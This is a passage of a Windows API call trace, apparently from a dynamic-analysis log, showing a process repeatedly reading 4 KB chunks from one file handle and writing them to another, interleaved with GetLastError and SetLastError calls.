returned 1 [0094.535] GetLastError () returned 0x0 [0094.535] SetLastError (dwErrCode=0x0) [0094.535] GetLastError () returned 0x0 [0094.535] SetLastError (dwErrCode=0x0) [0094.535] GetLastError () returned 0x0 [0094.535] SetLastError (dwErrCode=0x0) [0094.535] GetLastError () returned 0x0 [0094.535] SetLastError (dwErrCode=0x0) [0094.535] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.535] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.535] GetLastError () returned 0x0 [0094.535] SetLastError (dwErrCode=0x0) [0094.535] GetLastError () returned 0x0 [0094.535] SetLastError (dwErrCode=0x0) [0094.535] GetLastError () returned 0x0 [0094.535] SetLastError (dwErrCode=0x0) [0094.535] GetLastError () returned 0x0 [0094.535] SetLastError (dwErrCode=0x0) [0094.536] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.536] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.536] GetLastError () returned 0x0 [0094.536] SetLastError (dwErrCode=0x0) [0094.536] GetLastError () returned 0x0 [0094.536] SetLastError (dwErrCode=0x0) [0094.536] GetLastError () returned 0x0 [0094.536] SetLastError (dwErrCode=0x0) [0094.536] GetLastError () returned 0x0 [0094.536] SetLastError (dwErrCode=0x0) [0094.536] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.536] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.536] GetLastError () returned 0x0 [0094.536] SetLastError (dwErrCode=0x0) [0094.536] GetLastError () returned 0x0 [0094.536] SetLastError (dwErrCode=0x0) [0094.536] GetLastError () returned 0x0 [0094.537] SetLastError (dwErrCode=0x0) [0094.537] GetLastError () returned 0x0 [0094.537] SetLastError (dwErrCode=0x0) [0094.537] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.537] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.537] GetLastError () returned 0x0 [0094.537] SetLastError (dwErrCode=0x0) [0094.537] GetLastError () returned 0x0 [0094.537] SetLastError (dwErrCode=0x0) [0094.537] GetLastError () returned 0x0 [0094.537] SetLastError (dwErrCode=0x0) [0094.537] GetLastError () returned 0x0 [0094.537] SetLastError (dwErrCode=0x0) [0094.537] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.537] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.537] GetLastError () returned 0x0 [0094.537] SetLastError (dwErrCode=0x0) [0094.537] GetLastError () returned 0x0 [0094.537] SetLastError (dwErrCode=0x0) [0094.538] GetLastError () returned 0x0 [0094.538] SetLastError (dwErrCode=0x0) [0094.538] GetLastError () returned 0x0 [0094.538] SetLastError (dwErrCode=0x0) [0094.538] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.538] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.538] GetLastError () returned 0x0 [0094.538] SetLastError (dwErrCode=0x0) [0094.538] GetLastError () returned 0x0 [0094.538] SetLastError (dwErrCode=0x0) [0094.538] GetLastError () returned 0x0 [0094.538] SetLastError (dwErrCode=0x0) [0094.538] GetLastError () returned 0x0 [0094.538] SetLastError (dwErrCode=0x0) [0094.538] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.538] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.539] GetLastError () returned 0x0 [0094.539] SetLastError (dwErrCode=0x0) [0094.539] GetLastError () returned 0x0 [0094.539] SetLastError (dwErrCode=0x0) [0094.539] GetLastError () returned 0x0 [0094.539] SetLastError (dwErrCode=0x0) [0094.539] GetLastError () returned 0x0 [0094.539] SetLastError (dwErrCode=0x0) [0094.539] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.539] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.539] GetLastError () returned 0x0 [0094.539] SetLastError (dwErrCode=0x0) [0094.539] GetLastError () returned 0x0 [0094.539] SetLastError (dwErrCode=0x0) [0094.539] GetLastError () returned 0x0 [0094.539] SetLastError (dwErrCode=0x0) [0094.539] GetLastError () returned 0x0 [0094.539] SetLastError (dwErrCode=0x0) [0094.539] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.539] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.540] GetLastError () returned 0x0 [0094.540] SetLastError (dwErrCode=0x0) [0094.540] GetLastError () returned 0x0 [0094.540] SetLastError (dwErrCode=0x0) [0094.540] GetLastError () returned 0x0 [0094.540] SetLastError (dwErrCode=0x0) [0094.540] GetLastError () returned 0x0 [0094.540] SetLastError (dwErrCode=0x0) [0094.540] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.540] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.540] GetLastError () returned 0x0 [0094.540] SetLastError (dwErrCode=0x0) [0094.540] GetLastError () returned 0x0 [0094.540] SetLastError (dwErrCode=0x0) [0094.540] GetLastError () returned 0x0 [0094.540] SetLastError (dwErrCode=0x0) [0094.540] GetLastError () returned 0x0 [0094.541] SetLastError (dwErrCode=0x0) [0094.541] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.541] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.541] GetLastError () returned 0x0 [0094.541] SetLastError (dwErrCode=0x0) [0094.541] GetLastError () returned 0x0 [0094.541] SetLastError (dwErrCode=0x0) [0094.541] GetLastError () returned 0x0 [0094.541] SetLastError (dwErrCode=0x0) [0094.541] GetLastError () returned 0x0 [0094.541] SetLastError (dwErrCode=0x0) [0094.541] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.541] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.541] GetLastError () returned 0x0 [0094.541] SetLastError (dwErrCode=0x0) [0094.541] GetLastError () returned 0x0 [0094.542] SetLastError (dwErrCode=0x0) [0094.542] GetLastError () returned 0x0 [0094.542] SetLastError (dwErrCode=0x0) [0094.542] GetLastError () returned 0x0 [0094.542] SetLastError (dwErrCode=0x0) [0094.542] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.542] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.542] GetLastError () returned 0x0 [0094.542] SetLastError (dwErrCode=0x0) [0094.542] GetLastError () returned 0x0 [0094.542] SetLastError (dwErrCode=0x0) [0094.542] GetLastError () returned 0x0 [0094.542] SetLastError (dwErrCode=0x0) [0094.542] GetLastError () returned 0x0 [0094.542] SetLastError (dwErrCode=0x0) [0094.542] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.542] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.542] GetLastError () returned 0x0 [0094.542] SetLastError (dwErrCode=0x0) [0094.543] GetLastError () returned 0x0 [0094.543] SetLastError (dwErrCode=0x0) [0094.543] GetLastError () returned 0x0 [0094.543] SetLastError (dwErrCode=0x0) [0094.543] GetLastError () returned 0x0 [0094.543] SetLastError (dwErrCode=0x0) [0094.543] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.543] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.543] GetLastError () returned 0x0 [0094.543] SetLastError (dwErrCode=0x0) [0094.543] GetLastError () returned 0x0 [0094.543] SetLastError (dwErrCode=0x0) [0094.543] GetLastError () returned 0x0 [0094.543] SetLastError (dwErrCode=0x0) [0094.543] GetLastError () returned 0x0 [0094.543] SetLastError (dwErrCode=0x0) [0094.543] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.543] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.544] GetLastError () returned 0x0 [0094.544] SetLastError (dwErrCode=0x0) [0094.544] GetLastError () returned 0x0 [0094.544] SetLastError (dwErrCode=0x0) [0094.544] GetLastError () returned 0x0 [0094.544] SetLastError (dwErrCode=0x0) [0094.544] GetLastError () returned 0x0 [0094.544] SetLastError (dwErrCode=0x0) [0094.544] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.544] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.544] GetLastError () returned 0x0 [0094.544] SetLastError (dwErrCode=0x0) [0094.544] GetLastError () returned 0x0 [0094.544] SetLastError (dwErrCode=0x0) [0094.544] GetLastError () returned 0x0 [0094.544] SetLastError (dwErrCode=0x0) [0094.544] GetLastError () returned 0x0 [0094.544] SetLastError (dwErrCode=0x0) [0094.544] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.544] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.545] GetLastError () returned 0x0 [0094.545] SetLastError (dwErrCode=0x0) [0094.545] GetLastError () returned 0x0 [0094.545] SetLastError (dwErrCode=0x0) [0094.545] GetLastError () returned 0x0 [0094.545] SetLastError (dwErrCode=0x0) [0094.545] GetLastError () returned 0x0 [0094.545] SetLastError (dwErrCode=0x0) [0094.545] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.545] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.546] GetLastError () returned 0x0 [0094.547] SetLastError (dwErrCode=0x0) [0094.547] GetLastError () returned 0x0 [0094.547] SetLastError (dwErrCode=0x0) [0094.547] GetLastError () returned 0x0 [0094.547] SetLastError (dwErrCode=0x0) [0094.547] GetLastError () returned 0x0 [0094.556] SetLastError (dwErrCode=0x0) [0094.556] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.556] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.556] GetLastError () returned 0x0 [0094.556] SetLastError (dwErrCode=0x0) [0094.556] GetLastError () returned 0x0 [0094.556] SetLastError (dwErrCode=0x0) [0094.557] GetLastError () returned 0x0 [0094.557] SetLastError (dwErrCode=0x0) [0094.557] GetLastError () returned 0x0 [0094.557] SetLastError (dwErrCode=0x0) [0094.557] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.557] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.557] GetLastError () returned 0x0 [0094.557] SetLastError (dwErrCode=0x0) [0094.557] GetLastError () returned 0x0 [0094.557] SetLastError (dwErrCode=0x0) [0094.557] GetLastError () returned 0x0 [0094.557] SetLastError (dwErrCode=0x0) [0094.557] GetLastError () returned 0x0 [0094.557] SetLastError (dwErrCode=0x0) [0094.557] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.557] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.558] GetLastError () returned 0x0 [0094.558] SetLastError (dwErrCode=0x0) [0094.558] GetLastError () returned 0x0 [0094.558] SetLastError (dwErrCode=0x0) [0094.558] GetLastError () returned 0x0 [0094.558] SetLastError (dwErrCode=0x0) [0094.558] GetLastError () returned 0x0 [0094.558] SetLastError (dwErrCode=0x0) [0094.558] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.558] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.558] GetLastError () returned 0x0 [0094.558] SetLastError (dwErrCode=0x0) [0094.558] GetLastError () returned 0x0 [0094.558] SetLastError (dwErrCode=0x0) [0094.558] GetLastError () returned 0x0 [0094.558] SetLastError (dwErrCode=0x0) [0094.558] GetLastError () returned 0x0 [0094.558] SetLastError (dwErrCode=0x0) [0094.558] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.558] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.559] GetLastError () returned 0x0 [0094.559] SetLastError (dwErrCode=0x0) [0094.559] GetLastError () returned 0x0 [0094.559] SetLastError (dwErrCode=0x0) [0094.559] GetLastError () returned 0x0 [0094.559] SetLastError (dwErrCode=0x0) [0094.559] GetLastError () returned 0x0 [0094.559] SetLastError (dwErrCode=0x0) [0094.559] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.559] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.559] GetLastError () returned 0x0 [0094.559] SetLastError (dwErrCode=0x0) [0094.559] GetLastError () returned 0x0 [0094.559] SetLastError (dwErrCode=0x0) [0094.559] GetLastError () returned 0x0 [0094.559] SetLastError (dwErrCode=0x0) [0094.559] GetLastError () returned 0x0 [0094.559] SetLastError (dwErrCode=0x0) [0094.560] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.560] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.560] GetLastError () returned 0x0 [0094.560] SetLastError (dwErrCode=0x0) [0094.560] GetLastError () returned 0x0 [0094.560] SetLastError (dwErrCode=0x0) [0094.560] GetLastError () returned 0x0 [0094.560] SetLastError (dwErrCode=0x0) [0094.560] GetLastError () returned 0x0 [0094.560] SetLastError (dwErrCode=0x0) [0094.560] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.560] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.560] GetLastError () returned 0x0 [0094.560] SetLastError (dwErrCode=0x0) [0094.560] GetLastError () returned 0x0 [0094.560] SetLastError (dwErrCode=0x0) [0094.560] GetLastError () returned 0x0 [0094.560] SetLastError (dwErrCode=0x0) [0094.561] GetLastError () returned 0x0 [0094.561] SetLastError (dwErrCode=0x0) [0094.561] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.561] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.561] GetLastError () returned 0x0 [0094.561] SetLastError (dwErrCode=0x0) [0094.561] GetLastError () returned 0x0 [0094.561] SetLastError (dwErrCode=0x0) [0094.561] GetLastError () returned 0x0 [0094.561] SetLastError (dwErrCode=0x0) [0094.561] GetLastError () returned 0x0 [0094.561] SetLastError (dwErrCode=0x0) [0094.561] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.561] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.561] GetLastError () returned 0x0 [0094.561] SetLastError (dwErrCode=0x0) [0094.561] GetLastError () returned 0x0 [0094.561] SetLastError (dwErrCode=0x0) [0094.562] GetLastError () returned 0x0 [0094.562] SetLastError (dwErrCode=0x0) [0094.562] GetLastError () returned 0x0 [0094.562] SetLastError (dwErrCode=0x0) [0094.562] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.562] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.562] GetLastError () returned 0x0 [0094.562] SetLastError (dwErrCode=0x0) [0094.562] GetLastError () returned 0x0 [0094.562] SetLastError (dwErrCode=0x0) [0094.562] GetLastError () returned 0x0 [0094.562] SetLastError (dwErrCode=0x0) [0094.562] GetLastError () returned 0x0 [0094.562] SetLastError (dwErrCode=0x0) [0094.562] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.562] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.562] GetLastError () returned 0x0 [0094.562] SetLastError (dwErrCode=0x0) [0094.563] GetLastError () returned 0x0 [0094.563] SetLastError (dwErrCode=0x0) [0094.563] GetLastError () returned 0x0 [0094.563] SetLastError (dwErrCode=0x0) [0094.563] GetLastError () returned 0x0 [0094.563] SetLastError (dwErrCode=0x0) [0094.563] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.563] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.563] GetLastError () returned 0x0 [0094.563] SetLastError (dwErrCode=0x0) [0094.563] GetLastError () returned 0x0 [0094.563] SetLastError (dwErrCode=0x0) [0094.563] GetLastError () returned 0x0 [0094.563] SetLastError (dwErrCode=0x0) [0094.563] GetLastError () returned 0x0 [0094.563] SetLastError (dwErrCode=0x0) [0094.563] 